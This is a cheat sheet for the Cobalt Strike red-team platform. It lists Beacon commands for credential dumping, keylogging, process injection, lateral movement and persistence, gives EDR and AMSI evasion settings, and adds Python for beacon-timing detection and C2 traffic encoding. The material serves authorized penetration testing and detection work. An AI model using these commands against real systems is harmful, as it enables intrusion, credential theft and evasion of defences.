# Cobalt Strike Cheat Sheet
## Overview
Cobalt Strike is a commercial penetration-testing and red-team operations platform designed to emulate advanced threat actors. It provides a post-exploitation framework that lets operators deploy Beacons (agents) on compromised systems, establish command-and-control (C2) channels and carry out offensive security operations.
Warning: Cobalt Strike is a commercial security-testing tool and must only be used in environments where you have explicit permission to do so.
## Core Components
### Team Server
- Central command-and-control server
- Runs on Linux
- Hosts the listeners and manages the Beacons
- Shared by every operator connected to the same team operation
### Client
- Java-based GUI application
- Connects to the Team Server (TCP 50050 by default)
- Interface through which operators interact with Beacons
- Visualizes the target network
### Beacon
- Primary post-exploitation payload
- Communicates with the Team Server (directly, or through another Beacon for SMB/TCP peers)
- Provides the offensive capabilities (the commands listed below)
- Can run over several channels: HTTP, HTTPS, DNS, SMB named pipes, TCP
## Setup and Configuration
### Team Server Setup
```bash
# Start the Team Server (the IP must be reachable by the clients; the password is shared by all operators)
./teamserver <ip_address> <password> [malleable_c2_profile]
# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
```
Keep port 50050 firewalled to operator addresses only and put redirectors in front of the listeners; the Team Server itself should never be directly exposed to the target.
### Client Setup
```
1. Launch the Cobalt Strike client
2. Connect > New Connection
3. Enter Team Server details:
   - Host: <team_server_ip>
   - Port: 50050 (default)
   - User: <username>
   - Password: <password>
4. Verify the SSL certificate fingerprint against the SHA256 hash the Team Server printed at start-up
```
## Listeners
### Creating Listeners
- Cobalt Strike > Listeners
- Click "Add"
- Configure listener settings:
  - Name:
  - Payload:
  - Host:
  - Port:
  - Profile:
- Click "Save"
### Listener Types
|Type|Description|
|------|-------------|
|HTTP|Beacon over HTTP (egress channel)|
|HTTPS|Beacon over HTTPS (egress channel); the certificate comes from the profile's `https-certificate` block or the listener dialog|
|DNS|Beacon over DNS queries (A, AAAA or TXT records) for low-and-slow C2; the Team Server must be authoritative for the domain|
|SMB|Peer-to-peer Beacon over a named pipe; reached through a parent Beacon with `link`, no direct egress|
|TCP|Peer-to-peer Beacon on a bind TCP port; reached through a parent Beacon with `connect`|
|Foreign|Hands a session to another framework (e.g. Metasploit's reverse HTTP/HTTPS handlers)|
## Payload Generation
### Beacon Payload Types
Attacks > Packages > ...
|Payload Type|Description|
|--------------|-------------|
|Windows Executable|Standard .exe; "Windows Executable" is staged, "Windows Executable (S)" is stageless (the full Beacon is embedded)|
|Windows Service EXE|Service executable (for PsExec-style delivery)|
|DLL|Dynamic Link Library, loaded by rundll32 or a host process|
|PowerShell|PowerShell one-liner (Payload Generator / Scripted Web Delivery)|
|Python|Python script (Payload Generator)|
|Office Macro|Macro for Office documents|
|Shellcode|Raw shellcode (Payload Generator, for custom loaders)|
Staged payloads fetch Beacon from the stager URI at run time; the small stager and its download are easy to signature, so stageless (S) artifacts are the usual choice.
### Artifact Kit
Attacks > Packages > Windows Executable (S)
- Source-code kit (for licensed users) that builds the EXE, service EXE and DLL templates behind the Windows Executable packages
- Change how the artifacts load shellcode to alter their signatures and evade detection
- Rebuilt artifacts replace the defaults once the kit's generated Aggressor script is loaded in the client
## Beacon Commands
### Session Management
|Command|Description|
|---------|-------------|
|`help [command]`|Display help, or the arguments of one command|
|`sleep [seconds] [jitter%]`|Set the check-in interval and jitter; `sleep 0` makes the Beacon interactive, jitter shortens each sleep by a random 0 to jitter% of the interval|
|`checkin`|Force an immediate check-in|
|`exit`|Terminate the Beacon session|
|`clear`|Clear the Beacon's task queue|
|`jobs`|List running jobs|
|`jobkill [JID]`|Kill a running job|
|`mode dns`|DNS Beacon: use A records as the data channel|
|`mode dns-txt`|DNS Beacon: use TXT records (more data per request)|
|`mode dns6`|DNS Beacon: use AAAA records|
|`mode http`|DNS Beacon: use HTTP as the data channel|
The `mode` commands only apply to the DNS Beacon; HTTP/S, SMB and TCP Beacons have a fixed channel.
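As an added example (not code from the original cheat sheet or from Cobalt Strike), the following Python models what `sleep [seconds] [jitter%]` does to the check-in cadence, and then runs the defender's counterpart, the inter-arrival regularity check a detection engineer applies to proxy or firewall timestamps per source/destination pair. The timestamps it consumes are constructed in the block, and the `max_cv` threshold is an assumed tuning value, not a documented one.

```python
import random
import statistics
from typing import List, Tuple


def beacon_interval(sleep_s: float, jitter_pct: int, rng: random.Random) -> float:
    """One check-in interval for `sleep <seconds> <jitter%>`.

    Cobalt Strike applies jitter downward only: each sleep is the configured
    time minus a random 0..jitter% of it, so `sleep 60 20` yields 48-60 s.
    """
    if not 0 <= jitter_pct <= 99:
        raise ValueError("jitter must be 0-99 percent")
    return sleep_s - sleep_s * (jitter_pct / 100.0) * rng.random()


def interval_bounds(sleep_s: float, jitter_pct: int) -> Tuple[float, float]:
    """Smallest and largest interval the Beacon can pick."""
    return sleep_s * (1 - jitter_pct / 100.0), sleep_s


def simulate_checkins(sleep_s: float, jitter_pct: int, count: int, seed: int = 1) -> List[float]:
    """Constructed check-in times in seconds, relative to the first check-in."""
    rng = random.Random(seed)
    t, times = 0.0, []
    for _ in range(count):
        t += beacon_interval(sleep_s, jitter_pct, rng)
        times.append(t)
    return times


def beaconing_score(timestamps: List[float]) -> float:
    """Coefficient of variation (stdev/mean) of the inter-arrival times.

    Human browsing gives a CV well above 1. A Beacon with jitter j% is bounded
    by the CV of a uniform distribution on [sleep*(1-j/100), sleep], which is
    about 0.19 even at j=50, so jitter alone does not hide the cadence.
    """
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 2:
        raise ValueError("need at least three check-ins")
    return statistics.pstdev(gaps) / statistics.mean(gaps)


def looks_like_beacon(timestamps: List[float], max_cv: float = 0.3) -> bool:
    """Flag a source/destination pair whose traffic is too regular to be human."""
    return beaconing_score(timestamps) < max_cv


# Constructed data: a Beacon on `sleep 60 20` versus a user browsing one site.
BEACON_TIMES = simulate_checkins(60, 20, 50)
HUMAN_TIMES = [0, 5, 305, 317, 1217, 1257, 1259, 1859]

if __name__ == "__main__":
    print("beacon CV", round(beaconing_score(BEACON_TIMES), 3), looks_like_beacon(BEACON_TIMES))
    print("human  CV", round(beaconing_score(HUMAN_TIMES), 3), looks_like_beacon(HUMAN_TIMES))
```

The check is deliberately per pair and window-based; a `sleep 0` interactive session or a very long sleep (hours) with few observations will not score, which is exactly why low-and-slow DNS Beacons are configured that way.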
### Information Gathering
|Command|Description|
|---------|-------------|
|`getuid`|Show the user the Beacon's current token belongs to|
|`ps`|List running processes (PID, PPID, arch, user)|
|`pwd`|Print working directory|
|`drives`|List available drives|
|`ls [directory]`|List files in a directory|
|`net [command]`|Built-in network enumeration (`net view`, `net computers`, `net dclist`, `net domain`, `net localgroup`, `net logons`, `net sessions`, `net share`, `net user`, ...) without spawning cmd.exe|
|`reg query [x86\|x64] [HKLM\|HKCU] [path]`|Query a registry key|
|`shell hostname`, `shell ipconfig /all`, `shell netstat -ano`, `shell tasklist`, `shell whoami /all`, `shell systeminfo`|Not Beacon built-ins: plain Windows commands run through cmd.exe; each `shell` spawns a child process, which is noisy|
### File Operations
|Command|Description|
|---------|-------------|
|`cd [directory]`|Change directory|
|`cp [source] [destination]`|Copy a file|
|`mkdir [directory]`|Create a directory|
|`mv [source] [destination]`|Move or rename a file|
|`rm [file\|directory]`|Delete a file or a folder|
|`download [file]`|Download a file from the target to the Team Server (View > Downloads); `downloads` lists transfers in progress, `cancel [file]` stops one|
|`upload [local file]`|Upload a file into the target's current working directory|
|`timestomp [dest] [src]`|Copy the timestamps of `src` onto `dest`|
There is no `cat`, `dir` or `rmdir` built-in: use `ls`, `rm` and `download` (or `shell type [file]`, at the cost of a cmd.exe process).
### Process Operations
|Command|Description|
|---------|-------------|
|`execute [program] [args]`|Run a program without capturing output|
|`shell [command]`|Run a command via cmd.exe and capture output|
|`run [program] [args]`|Run a program directly (no cmd.exe) and capture output|
|`runas [DOMAIN\user] [password] [command]`|Run a command as another user (plaintext credentials)|
|`pth [DOMAIN\user] [NTLM hash]`|Pass-the-hash: runs mimikatz `sekurlsa::pth`, spawns a process with the hash and steals its token; the token is only valid for network authentication|
|`steal_token [pid]`|Impersonate the token of a process|
|`make_token [DOMAIN\user] [password]`|Create a netonly token: the credentials are used on the network only and are not validated locally, so a wrong password is not detected until a remote access fails|
|`rev2self`|Drop the impersonated token|
|`getprivs`|Enable the privileges available to the current token|
|`getsystem`|Attempt to impersonate SYSTEM|
|`execute-assembly [/path/to/file.exe] [args]`|Run a .NET assembly in memory inside a sacrificial process (see `spawnto`)|
|`powerpick [cmdlet]`|Run PowerShell without powershell.exe (unmanaged PowerShell)|
|`powershell [cmdlet]`|Run PowerShell via powershell.exe|
|`powershell-import [/path/to/script.ps1]`|Import a script for use by `powershell`, `powerpick` and `psinject`|
|`psinject [pid] [arch] [cmdlet]`|Run unmanaged PowerShell inside an existing process|
|`shinject [pid] [arch] [/path/to/file.bin]`|Inject shellcode into a process|
|`dllinject [pid] [/path/to/file.dll]`|Inject a Reflective DLL into a process|
|`dllload [pid] [c:\path\to\file.dll]`|Load an on-disk DLL into a process with LoadLibrary|
### Lateral Movement
|Command|Description|
|---------|-------------|
|`jump [method] [target] [listener]`|Spawn a Beacon on a remote host; methods include `psexec`, `psexec64`, `psexec_psh`, `winrm`, `winrm64` (run `jump` alone to list them)|
|`psexec [target] [share] [listener]`|Copy a service EXE to `ADMIN$` or `C$`, then create and start a service|
|`psexec_psh [target] [listener]`|Create a service that runs a PowerShell one-liner (nothing written to disk)|
|`remote-exec [method] [target] [command]`|Run a single command on a remote host; methods: `psexec`, `winrm`, `wmi`|
|`ssh [target:port] [user] [password]`|Open an SSH session (Beacon-like session on a Unix host) with a password|
|`ssh-key [target:port] [user] [/path/to/key.pem]`|Open an SSH session with a key|
|`link [target] [pipename]`|Connect to an SMB Beacon waiting on the target|
|`connect [target] [port]`|Connect to a TCP Beacon waiting on the target|
|`dcsync [DOMAIN.fqdn] [DOMAIN\user]`|Use mimikatz DCSync to pull a user's hashes from a DC; needs replication rights (Domain Admin or equivalent), not a Beacon on the DC|
### Pivoting
|Command|Description|
|---------|-------------|
|`rportfwd [bind port] [forward host] [forward port]`|Reverse port forward: the Beacon host listens, traffic is relayed to the forward host from the Team Server|
|`rportfwd stop [bind port]`|Stop a reverse port forward|
|`rportfwd_local [bind port] [forward host] [forward port]`|Like `rportfwd`, but the traffic exits from the operator's client instead of the Team Server|
|`socks [port]`|Start a SOCKS proxy on the Team Server that tunnels through this Beacon (lower the sleep first, SOCKS through a slow Beacon is painful)|
|`socks stop`|Stop the SOCKS proxy|
|`spunnel [x86\|x64] [controller host] [controller port] [/path/to/agent.bin]`|Spawn a third-party agent (e.g. Meterpreter) and tunnel it back to its controller through a reverse port forward|
|`covertvpn [interface] [IP address]`|Deploy a Covert VPN (layer-2) client on the target; requires the Team Server on Linux|
Pivot listeners (a TCP bind listener hosted on a Beacon, for hosts without egress) are not a console command: right-click the Beacon > Pivoting > Listener.
### Post-Exploitation
|Command|Description|
|---------|-------------|
|`mimikatz [command]`|Run a mimikatz command (e.g. `mimikatz sekurlsa::logonpasswords`); prefix the command with `!` to run as SYSTEM, `@` to run with Beacon's current token|
|`hashdump`|Dump local SAM hashes (needs SYSTEM)|
|`logonpasswords`|Dump credentials from LSASS memory via mimikatz (needs local admin)|
|`keylogger [pid] [arch]`|Inject a keylogger into a process|
|`screenshot [pid] [arch] [time]`|Take a screenshot from a process (`time` = seconds to run)|
|`screenwatch [pid] [arch]`|Take periodic screenshots|
|`printscreen [pid] [arch]`|Take a screenshot using the PrintScr key|
|`portscan [targets] [ports] [arp\|icmp\|none] [max connections]`|Scan for open ports|
|`browserpivot [pid] [x86\|x64]`|Proxy web traffic through Internet Explorer's authenticated sessions|
|`chromedump`|Dump Chrome cookies and saved logins|
|`elevate [exploit] [listener]`|Privilege escalation exploit that spawns a new elevated Beacon (`elevate` alone lists the exploits)|
|`runasadmin [exploit] [command]`|Privilege escalation exploit that runs a single command elevated|
There is no `powerview` command: import the script with `powershell-import PowerView.ps1` and call its cmdlets with `powerpick`. There is no `persist` command either; see Persistence under Common Workflows.
## Malleable C2 Profiles
### Basic Structure
```
# Global options
set sleeptime "5000";
set jitter    "10";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

# HTTP staging (separate URIs are required for the x86 and x64 stagers;
# the x64 value here is a placeholder to make the block lint-clean)
http-stager {
    set uri_x86 "/jquery-3.3.1.min.js";
    set uri_x64 "/jquery-3.3.2.min.js";
    client {
        header "Accept" "text/javascript, application/javascript, */*";
    }
    server {
        header "Content-Type" "application/javascript";
    }
}

# HTTP GET: Beacon check-in. Transforms run top to bottom and the last
# statement (header/parameter/print/uri-append) says where the data goes.
http-get {
    set uri "/api/v1/data";
    client {
        header "Accept" "application/json";
        metadata {
            base64;
            prepend "session=";
            append ";";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/json";
        output {
            base64;
            prepend "{\"data\":\"";
            append "\"}";
            print;
        }
    }
}
```
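As an added example (not code from the original page or from Cobalt Strike), the following Python implements the `metadata` and `output` transform pipelines of the http-get block above in both directions, so the check-in can be seen exactly as it appears on the wire and decoded the way the Team Server, or a detection engineer's proxy decoder, reverses it. It goes beyond the profile by also covering the `netbios`/`netbiosu`/`base64url` transforms. The metadata and task bytes are constructed placeholders; real metadata is RSA-encrypted and real tasks are AES-encrypted, so even a decoded pipeline only yields opaque blobs.

```python
import base64
from typing import Dict, List, Tuple

# Pipelines copied from the http-get block above; the last entry is the terminator.
METADATA_STEPS: List[Tuple[str, ...]] = [("base64",), ("prepend", "session="), ("append", ";"), ("header", "Cookie")]
OUTPUT_STEPS: List[Tuple[str, ...]] = [("base64",), ("prepend", '{"data":"'), ("append", '"}'), ("print",)]


def netbios_encode(data: bytes, upper: bool = False) -> bytes:
    """Malleable `netbios`/`netbiosu`: each nibble becomes one letter a-p (A-P)."""
    base = ord("A") if upper else ord("a")
    return bytes(base + n for b in data for n in (b >> 4, b & 0x0F))


def netbios_decode(data: bytes, upper: bool = False) -> bytes:
    base = ord("A") if upper else ord("a")
    nib = [c - base for c in data]
    return bytes((hi << 4) | lo for hi, lo in zip(nib[0::2], nib[1::2]))


def apply_transforms(data: bytes, steps: List[Tuple[str, ...]]) -> Tuple[Tuple[str, ...], bytes]:
    """Client side: run the transforms in profile order, return (terminator, result)."""
    out = data
    for step in steps[:-1]:
        op = step[0]
        if op == "base64":
            out = base64.b64encode(out)
        elif op == "base64url":
            out = base64.urlsafe_b64encode(out).rstrip(b"=")
        elif op in ("netbios", "netbiosu"):
            out = netbios_encode(out, upper=(op == "netbiosu"))
        elif op == "prepend":
            out = step[1].encode() + out
        elif op == "append":
            out = out + step[1].encode()
        else:
            raise ValueError(f"unsupported transform {op}")
    return steps[-1], out


def invert_transforms(encoded: bytes, steps: List[Tuple[str, ...]]) -> bytes:
    """Server side: undo the pipeline in reverse; a mismatch means 'not this profile'."""
    out = encoded
    for step in reversed(steps[:-1]):
        op = step[0]
        if op == "base64":
            out = base64.b64decode(out)
        elif op == "base64url":
            out = base64.urlsafe_b64decode(out + b"=" * (-len(out) % 4))
        elif op in ("netbios", "netbiosu"):
            out = netbios_decode(out, upper=(op == "netbiosu"))
        elif op == "prepend":
            prefix = step[1].encode()
            if not out.startswith(prefix):
                raise ValueError("prepend value missing")
            out = out[len(prefix):]
        elif op == "append":
            suffix = step[1].encode()
            if not out.endswith(suffix):
                raise ValueError("append value missing")
            out = out[:len(out) - len(suffix)]
        else:
            raise ValueError(f"unsupported transform {op}")
    return out


def build_get_request(metadata: bytes, host: str) -> Dict[str, str]:
    """Headers of Beacon's GET /api/v1/data check-in under this profile."""
    terminator, encoded = apply_transforms(metadata, METADATA_STEPS)
    assert terminator == ("header", "Cookie")      # fixed by the profile above
    return {"Host": host, "Accept": "application/json", terminator[1]: encoded.decode()}


def extract_metadata(headers: Dict[str, str]) -> bytes:
    return invert_transforms(headers["Cookie"].encode(), METADATA_STEPS)


def build_get_response(tasks: bytes) -> bytes:
    """Whole response body (the `print` terminator) carrying queued tasks."""
    terminator, body = apply_transforms(tasks, OUTPUT_STEPS)
    assert terminator == ("print",)
    return body


def extract_tasks(body: bytes) -> bytes:
    return invert_transforms(body, OUTPUT_STEPS)


# Constructed sample bytes; real values are encrypted blobs of the same shape.
SAMPLE_METADATA = b"\x00\x01beacon-meta"
SAMPLE_TASKS = b"\x00\x00\x00\x04task"

if __name__ == "__main__":
    req = build_get_request(SAMPLE_METADATA, "www.example.com")
    print(req["Cookie"])                  # session=AAFiZWFjb24tbWV0YQ==;
    print(build_get_response(SAMPLE_TASKS).decode())
```

The ordering matters in both directions: `base64` must precede `prepend`/`append` in the profile, otherwise the wrapper text gets base64-encoded along with the data and the Team Server's inverse fails; `c2lint` catches a missing terminator but not a pipeline that merely looks wrong to a human.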
### Testing Profiles
```bash
# Verify profile syntax; c2lint also prints sample requests/responses and checks that stagers and stages still build
./c2lint c2-profiles/normal/amazon.profile
# Start Team Server with the profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
```
## Aggressor Scripts
### Basic Script Structure
```
# Event handlers ($1 is the Beacon ID)
on beacon_initial {
    println("New beacon: " . $1);
}

# Aliases (custom Beacon console commands)
alias hello {
    blog($1, "Hello, World!");
}

# Menus: in a Beacon popup $1 is an array of the selected Beacon IDs
popup beacon_bottom {
    item "Custom Command" {
        foreach $bid ($1) {
            blog($bid, "Executing custom command...");
            bshell($bid, "whoami");
        }
    }
}

# Functions
sub get_system_info {
    bshell($1, "systeminfo");
}
```
Load scripts through Cobalt Strike > Script Manager; each operator's client loads its own.
### Common Script Functions
|Function|Description|
|---|---|
|`blog($1, "message")`|Write to the Beacon console|
|`bshell($1, "command")`|Run a command via cmd.exe|
|`bpowershell($1, "command")`|Run a PowerShell command|
|`bpowerpick($1, "command")`|Run PowerShell without powershell.exe|
|`bexecute_assembly($1, "/path/to/file.exe", "args")`|Run a .NET assembly in memory|
|`bdllspawn($1, "/path/to/file.dll", "param", "description", $block_time)`|Spawn a process and inject a Reflective DLL as a post-ex job|
|`bpsexec($1, "target", "ADMIN$", "listener")`|PsExec lateral movement|
|`bwinrm($1, "target", "listener")`|WinRM lateral movement|
|`bjump($1, "psexec", "target", "listener")`|Lateral movement through any `jump` method|
|`bremote_exec($1, "wmi", "target", "command")`|Run a command remotely via psexec, winrm or wmi|
## OPSEC Considerations
### Process Injection and Spawning
```
# Spoof the parent of processes Beacon spawns (must be a process Beacon can open, ideally on the same desktop)
ppid [pid]
# Set the sacrificial process used for post-ex jobs (execute-assembly, powerpick, mimikatz, keylogger, ...)
spawnto x64 %windir%\sysnative\rundll32.exe
spawnto x86 %windir%\syswow64\rundll32.exe
# Spoof the command line of processes Beacon spawns
argue [command] [fake arguments]
# Block non-Microsoft DLLs (EDR user-mode hooks) from loading into child processes
blockdlls start
blockdlls stop
```
rundll32.exe started with no arguments is itself a well-known detection; pick a `spawnto` that is normal for the environment and spawns with a plausible command line.
### Evasion Techniques
The memory and AMSI evasion controls are Malleable C2 options in the profile's `stage` and `post-ex` blocks, not Beacon console commands; they are baked in when the Team Server starts, so changing them means re-linting the profile and restarting.
```
stage {
    set obfuscate "true";       # obfuscate Beacon's reflective DLL in memory
    set stomppe "true";         # overwrite PE header magic values after loading
    set cleanup "true";         # free the reflective loader stub once Beacon is running
    set sleep_mask "true";      # mask Beacon's image and heap while it sleeps
    set smartinject "true";     # hand key function pointers to injected post-ex DLLs instead of walking exports
}
post-ex {
    set amsi_disable "true";    # patch AMSI in the post-ex process before powerpick, psinject and execute-assembly
    set spawnto_x86 "%windir%\\syswow64\\rundll32.exe";
    set spawnto_x64 "%windir%\\sysnative\\rundll32.exe";
}
```
## Common Workflows
### Initial Access
1. Create a listener (Cobalt Strike > Listeners)
2. Generate a payload (Attacks > Packages)
3. Deliver the payload to the target
4. Wait for the Beacon to check in
### Privilege Escalation
1. Check current privileges: `getuid`
2. Attempt to get SYSTEM: `getsystem`
3. If unsuccessful, try a specific exploit: `elevate [exploit] [listener]`
4. Verify the new privileges: `getuid`
### Credential Harvesting
1. Dump local hashes: `hashdump`
2. Dump credentials from memory: `logonpasswords`
3. Use mimikatz for advanced options: `mimikatz [command]`
4. Extract domain hashes (with replication rights): `dcsync [DOMAIN.fqdn] [DOMAIN\user]`
### Lateral Movement
1. Identify targets: `net view`, `net computers`, `net dclist`
2. Choose a technique:
   - `jump psexec [target] [listener]`
   - `jump winrm [target] [listener]`
   - `remote-exec wmi [target] [command]`
3. Verify the new Beacon checks in
### Persistence
Cobalt Strike has no built-in persistence command; persistence is done with native Windows mechanisms (or community Aggressor scripts) and every mechanism must be recorded for cleanup.
1. Choose a persistence method:
   - Scheduled task: `shell schtasks /create ...`
   - Service: `shell sc create ...`
   - Run key: `shell reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run ...`
2. Verify that persistence works (reboot or log off, wait for the new check-in)
3. Document every persistence mechanism for cleanup at the end of the engagement
## Resources
- [Official Cobalt Strike documentation](LINK_5)
- [Cobalt Strike User Guide](LINK_5)
- [Malleable C2 profiles](LINK_5)
- [Aggressor Script documentation](LINK_5)
- Cobalt Strike MITRE ATT&CK mapping